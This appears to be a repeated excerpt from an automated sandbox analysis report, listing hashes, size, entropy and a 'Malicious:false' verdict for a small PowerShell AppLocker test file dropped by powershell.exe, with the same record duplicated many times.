                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
